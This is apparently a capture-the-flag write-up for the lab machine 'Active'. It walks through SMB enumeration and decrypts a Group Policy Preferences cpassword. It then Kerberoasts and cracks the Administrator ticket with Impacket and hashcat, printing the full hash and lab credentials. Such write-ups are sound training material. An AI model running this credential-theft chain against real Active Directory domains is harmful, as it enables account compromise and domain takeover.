Active
Writeup
After scanning, we know how many ports are opened, hostname and operating system is running on.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
nmap -sC -sV 10.129.48.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-28 18:13 EST
Nmap scan report for 10.129.48.58
Host is up (0.053s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-28 23:13:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-12-28T23:14:05
|_ start_date: 2025-12-28T23:00:30
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
So we see port 445 SMB is opened. Let examine with smbmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
smbmap -H 10.129.48.58
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.58:445 Name: 10.129.48.58 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
We can see all permissions of the shares, and we know which share we can access with anonymous. Let deep dive into it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
smbmap -H 10.129.48.58 -r Replication --depth 7
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.48.58:445 Name: 10.129.48.58 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replication
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
./Replication//active.htb
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
./Replication//active.htb/DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
./Replication//active.htb/Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 06:38:11 2018 GptTmpl.inf
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 06:38:11 2018 GptTmpl.inf
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
We can see an interesting file Groups.xml
1
2
3
4
5
cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We have username and hashed password here. We can use gpp-decrypt to crack Group Policy Preference password.
1
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
After getting the password, we scan the permission again with this credential
1
2
3
4
5
6
7
8
9
10
11
smbmap -H 10.129.48.58 -u "SVC_TGS" -p "GPPstillStandingStrong????"
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We have more shares with permissions here, now use smbclient to login and get the user’s flag.
1
smbclient //10.129.48.58/Users -U"SVC_TGS"%"GPPstillStandingStrong2k18"
We’ll use the GetUserSPNs.py script from Impacket to get a list of service usernames which are associated with normal user accounts. It will also get a ticket that us can crack.
Let set it up first.
1
2
3
4
5
6
7
wget https://raw.githubusercontent.com/fortra/impacket/refs/heads/master/examples/GetUserSPNs.py
python3 -m venv myenv
source myenv/bin/activate
pip uninstall impacket
sudo apt remove python3-impacket
python3 -m pip install impacket
Then execute it with python to get the ticket
1
2
3
4
python3 GetUserSPNs.py -request -dc-ip 10.129.48.58 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$aa80f0c121d7fc1357e88656b901a80b$23b4d5e83d81098bd2a4ee52efa36da8eb8059bf642b223c210792960e27cd5fafe9e778958a3b64f18f295bc90ccfcd3e6dc88ad40658ae623e9b61333b33160bc3d77e9df9a44707be4241b2bf10761890de5b9de58e4925f952f50d5a11c64053689745bf014d3f091ff80ce5377d924e68f0d11806c840675d733d146d950a4fc09a57d66908907594e032286dc73dc520d0e39d09c5453dc7e2934589e36e9a596f753f53cb58a1100f7827859c8231876043cc1bd96f64e5ecb3609a19680cf1ff900b998081be0862b7b193f17b582d78b140ab57c042421bf369d735736eeda7727e4e28dafd4fd6cd954aea4995111d5d343df9bd230c1d46a69d5f569644e681c89b791715f4befde14a2da87b50a62500ddcd967f1439112be865f850c58f38e4cca03644de705f2404c8f865a920a2fc91d08c54269fde11e18c6736314f1193eebaadb6f6491849659da1ee46a995b703a9e01797a5084d210eb65d49d2102acb2f1a98f715d07053ca63b18346927f6bf348994015ef77e16da48790c117b3e6467b0c6918a19c2b4f7dd02dc1a89591e028c7e570e5ebb37ff9683deb89720b7f60616e6f48ea076f09da83cfdd8b2789430b4fac77d08c8398c9607ab5f6ed5a7a96754f63b78f0459d25a4733107a220ca213a0d3b1a87c1eca9200bb132d5943596572cd604c2c8cf6b6b83e7234347a7bc239b397cea06d881771c2a1120c52eb065219e3605ea81ef1af6068a7eb17cb767ba5b9b306739a905cdb1a9ca02f366dad669121a6bdb9b260ccd1f99d2a07c5e2fad48a8213eb4520acd76b434cafd45a331eef96563476e614afe45aec7653b9c4c4a5ca827ef4d0c18b48363ca5c14232e8087effb9b03a7f31977075b9735c364a4ee24e824dc2641a35de346bc5bcd38667832931b065cc148d1f8d5ab255abbfb70d13b8daaeb1d56f697fb98ce1800b4eddf59f78d8fdb456dc9990a0e5a3919229750a6a25b3acd6deb188bc3a5fc186bcdf37c76e027b079c50376be11c1014795a5057564551648adc94882893e9bae3c9421e51b9237d37e909dc8ad1a353b686ffa7568c8b4c8eb59e7bf3d5936a915a439c26777c8c6352da558b7c4e6078bc42df1c182c2a2e502ace5f72e1ab43fc4f8b698a7ed3d4e45928335d2bbfca76069b2a0d94386a571cfa9ef26d96bc913717f32114dbce50605ded8d4ec0199facfc94756c2a172e0d1f8c74c04cf7bb1aefaad27d209e5504
Using hashcat to crack it.
1
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt
We will retrieve the password of Administrator. Now use this credential to login with smbclient and get the root flag.
1
smbclient //10.129.48.58/Users -U"Administrator"%"Ticketmaster????"